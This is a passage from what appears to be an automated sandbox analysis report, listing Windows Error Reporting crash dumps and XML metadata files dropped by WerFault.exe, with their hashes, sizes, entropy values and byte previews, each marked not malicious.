                                                                                                                                                                                                          SHA-256:C68F5FFC58992E06A7C91B8285ABC35130949BB1A3127F3ED318B6134B419316
                                                                                                                                                                                                          SHA-512:4F8F30F465012B7CAA2F50A5A0CC93D75202684CEF1222C9BD332FCB1F12F58A795F53090CB2BCDA224DFD1A11D04CFD4348F68ECBCC655666DF03DA15DB9CD0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g.........................................>..........T.......8...........T............!...C..........P...........<...............................................................................eJ..............GenuineIntel............T............=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2545.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.706514763232686
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJc16B6YSGSU9/4gmfmgpru89bw9sfgQm:R6lXJ26B6YTSU9QgmfmSw2fu
                                                                                                                                                                                                          MD5:144C41009A3BF0BFE86F384E59501639
                                                                                                                                                                                                          SHA1:15E4C356B9DE7D8370C8B8EAD6843B7C48C20EB1
                                                                                                                                                                                                          SHA-256:5B8B9A6F945A9E3DD939AC984E76987499EAF1C795F6B7A9905CA27E465C0A4D
                                                                                                                                                                                                          SHA-512:2A450C3100ECA24B6AF23F29615723D9F5887BE4955C8BE94EAD3DB7A224500CB6EB7EC9557750CE463D75F287A3B57465A1DF838489FFAA18B88AC041C718F3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.8.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2585.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.5142717860888295
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYdYm8M4JCKgwFb+q8dgASHvlvjd:uIjfmI72AAm7VtJCKfS9evlvjd
                                                                                                                                                                                                          MD5:1FEE89B0A8FB1C397186241D590FBB08
                                                                                                                                                                                                          SHA1:C8D581B1718ADDAD8F7B076E920505E162684AFE
                                                                                                                                                                                                          SHA-256:34616F1C4EB82E567328D290D2A4257388DDAE1802CCE99A3A44D452CD4F98C2
                                                                                                                                                                                                          SHA-512:768932BB822E6A7F6FBBED0CB24C6CAC4A4781B89B8F000122EAAD4E8150108343F398EF219D559559B3B41F0112163DA168828DD6A075C53428118A31BDBFBC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2757.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:54 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):95868
                                                                                                                                                                                                          Entropy (8bit):1.8233144279177214
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:WQUWRMOh6ZgnRxqrSD8srGjOhMgEUlAfm:WQUiMOh+KREefSQWm
                                                                                                                                                                                                          MD5:20F4FB6F62C9F439FB948E076757A2B8
                                                                                                                                                                                                          SHA1:0934F4D3ABA3259FFC592674ACEF443AEBFABE94
                                                                                                                                                                                                          SHA-256:733B7CCFBC82BCD97A742160F245EA119088A3C611AEB1B0A9A8DE5C550EC9A6
                                                                                                                                                                                                          SHA-512:E6F8EDB2F889E8032BEBF29E3AC00C494D6347B2FB349FAEE04D23E62FF958C5CE5C7C03EF531A29CF87A26B33AEEFF7000C5E38F4AAF0444DC08A2666196F26
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g.........................................>..........T.......8...........T...........0!..LU..........P...........<...............................................................................eJ..............GenuineIntel............T............=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D92.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.7040324099213042
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJiv6h6YSsSU9Vbgmfmgprx89bG6sfyCm:R6lXJC6h6YZSU9pgmfmLGZfe
                                                                                                                                                                                                          MD5:0F19D3D89893A7989E485F12D48BFD31
                                                                                                                                                                                                          SHA1:0BA6BC2D45C56AC0ED0D294D492C97C58CFEE639
                                                                                                                                                                                                          SHA-256:01E0ED85722A4447AB4A2BFBF7FF8CFF058449DE4A444EDB66A502AC879FABD9
                                                                                                                                                                                                          SHA-512:5573917EDFE4CD742E3D81BDC6C67728FB2E0109D053981D3416692AAA46DF7C516720B4A9E9EED33E806B4F2C79B9452AB9FA5599E3E78C5127EC5264210B9C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.8.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E00.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.513868523139754
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYiRYm8M4JCKgwFhi+q8dghcJSHvlvyd:uIjfmI72AAm7VYJCKliSacJevlvyd
                                                                                                                                                                                                          MD5:3E9B2B15B3B162336F12B765A6F5A237
                                                                                                                                                                                                          SHA1:12BC9EC0213C2D69EF5F925F8517A7F3FF8F4073
                                                                                                                                                                                                          SHA-256:116DB3B9AC26A03FCC66F100C02ECA7343EC3064089E31F1D8294B36E5FE96D8
                                                                                                                                                                                                          SHA-512:984D3AE0CBEE5664DD66CC7C1EFD8210C82FE91E39E35AD8E72A7CABE56D2E6CC04B9A4119F9951EFBD9BB5791190E9EB62B08E5B61F778E668B68A32CEBF9C3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF40.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:39 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):99596
                                                                                                                                                                                                          Entropy (8bit):1.9986291711368998
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:73lKGOzaJuKX48gkepMhmBmdjwAE1hz2wONDkD503:7VKGO+pX48TepM6mpezKNyk
                                                                                                                                                                                                          MD5:F56AD4D5074A2DEB5647A13F37E0D3CE
                                                                                                                                                                                                          SHA1:2AD649BD035451F8602E463C767255E433D4E425
                                                                                                                                                                                                          SHA-256:A06607B359C7DDDC5C2A26F669B3615189B010E780A923FCEC83B63D1955BA4D
                                                                                                                                                                                                          SHA-512:A0C6D7864FBE06A7225F6299CF3C527C3C089FC428887947FF504A77765D1948F3E87C99A7716C552A9B5375DCD22F896C2B9D728C7A58838CB6CBCE5D48BE4A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g....................................D...V?..........T.......8...........T........... "...b......................................................................................................eJ......@.......GenuineIntel............T............=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF01B.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:39 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):101664
                                                                                                                                                                                                          Entropy (8bit):1.9261637664136209
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:CuG3lmOUeFYSxHYY82g2CINojE1B1FXGV/nTFhyoDdjABWGpa:cVmO6Sxv3C3A1BaVLFhyoDCvp
                                                                                                                                                                                                          MD5:A82200D8E85F9E00787D3997F39ABAF8
                                                                                                                                                                                                          SHA1:9994C142FDB29835B30F3E59D317D625445BC287
                                                                                                                                                                                                          SHA-256:B6D3AE93528A928CB529BB27C9B8EC667DB6289D0B714125F4CFDA01E6B2C4BB
                                                                                                                                                                                                          SHA-512:DC7A650C8DB5ACC2A8791BF879237823192FBAD914E0CEE6387F960DF418E0B9DC761C535581CFA5C1E5C2E97AFA4A71BF94E551DEF14B385F6D12D1CAB1463E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g....................................d...V?..........T.......8...........T............!..xk......................................................................................................eJ......@.......GenuineIntel............T............=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF481.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.7019951640916378
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJsh6cC6YSsSU97aZs5gmfmgprN89b6LsfA+m:R6lXJC6B6Y5SU9dgmfmP6QfQ
                                                                                                                                                                                                          MD5:EBF64A1506AA6C50E4593C1FBA3047D4
                                                                                                                                                                                                          SHA1:C2641BB6B05702B35F7FF43738844DF73B0B2958
                                                                                                                                                                                                          SHA-256:110E97B2D72D2CA0E86DDA0C4C042E4353AF7824B1EE18A4DD35DF1949C2DD07
                                                                                                                                                                                                          SHA-512:BCC354D985CC7D5B3330F6ADDC913C85401DF524F8E562F76A008383C1BEE6A9B6C34883DF749172C9B01AD3552F1C41BC5F8B485F4A5A501AB425B174B93EE4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.8.4.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF51D.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.701901561861991
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJJhJ6R6YSJSU97aZs5gmfmgpr+89b6xsfx+m:R6lXJx6R6YMSU9dgmfmC6qfR
                                                                                                                                                                                                          MD5:F1B2A0A9F6D3D63275A3451EF9B1DE1A
                                                                                                                                                                                                          SHA1:016EBAEA3166849F8C3F3B662B5B1346474947FE
                                                                                                                                                                                                          SHA-256:B79D8EB720337FAB49E2C3D26058A0B127F8D7DDF6C9C287CBEEF0535B10959E
                                                                                                                                                                                                          SHA-512:60DBA14F53C9C8F5F035425F92CB00C22D62092BAC75338763DF9F2D99C144E956C777E2ECA8C9CC454FF8543FE6C4B471FEB9F7B9348AE57510882251136E65
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.0.4.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF53D.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.513530434502717
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VY9Ym8M4JCKgwFQ1+q8dgVSHvlvLd:uIjfmI72AAm7VxJCKoSkevlvLd
                                                                                                                                                                                                          MD5:498429F3397F1D6D366B06F60F42C719
                                                                                                                                                                                                          SHA1:8B6595DC70CFBD7BCE58AACFDFEB9727B89EDDBB
                                                                                                                                                                                                          SHA-256:B31F33B97584515087903B8DD8E5124D65355265D02EACC8761ACC049F947E13
                                                                                                                                                                                                          SHA-512:1FE50291246952646EAE50CBC267F025F0160F18985672ECB20AEB750457C7E5A29B5164C0E10F113FCD01D804C68B7AD4E962B5E2E2DE5445D72B7744B33581
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF59B.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.511181271883728
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYyYm8M4JCKgwFQ0j+q8dgASHvlvydd:uIjfmI72AAm7VqJCKUcSxevlvydd
                                                                                                                                                                                                          MD5:2A227C8CF79D972D6A0CB03C7D2B8752
                                                                                                                                                                                                          SHA1:D85346C3FBA009C3F81EE633211A0E1D1FE85D87
                                                                                                                                                                                                          SHA-256:50473E9819A8CA08B3832463BBAEC5592DDD990BD3CE4D42EDEF59E87728D7DC
                                                                                                                                                                                                          SHA-512:7FD843353E48EA2569B8AC90EB5D1C301CD8A61FE1F2D110E69529CCE480FAAB1D370288F55EEADC2D5B44CD68F030F395C20231EB7193FF5AB059A5786BCC72
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF962.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:42 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):99508
                                                                                                                                                                                                          Entropy (8bit):1.946110054792765
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:H83l6Onrc8OguIN9dJ09IaMdt33uHbHTL6Ga2yHI7+BOq:cV6Or/Ogu09dJ0Eb33u7zLKs7+B
                                                                                                                                                                                                          MD5:26F141CFBAF874899DE0735F3D7EED36
                                                                                                                                                                                                          SHA1:21BCBC3D1E038CAFB6C1ABE2A0E8D0E4091334CF
                                                                                                                                                                                                          SHA-256:2120A1B867E0D13F24A8E289D6ABD08F656DEEB0099633E72ED53109EA35EDC9
                                                                                                                                                                                                          SHA-512:C14E123EB32ED3B15DBDB7D5ED7E294AB1E5F77A9FA12EACC4A013011B36CC5FE64E067F56E3E27C18A3E5779AC326C17D6423ABA68A07065711BA35E6AD6F93
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g....................................T...V?..........T.......8...........T............!...c......................................................................................................eJ......@.......GenuineIntel............T.......T....=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB28.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.702139447761712
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJgP6rnW6YSOSU97aZc++Fgmfmgprg89bI1sfYPYm:R6lXJg6a6Y7SU9BBFgmfm4IOfYV
                                                                                                                                                                                                          MD5:F8C7F524BA2FD37B8C3BCC3714EA8ADD
                                                                                                                                                                                                          SHA1:9CF82226BECBC50352408F7C5FEC8628BC0B7DD6
                                                                                                                                                                                                          SHA-256:DD8D0C4B0773EB286376FEB2811C1C327D9FC777A0A7D3BE01B283401766C70D
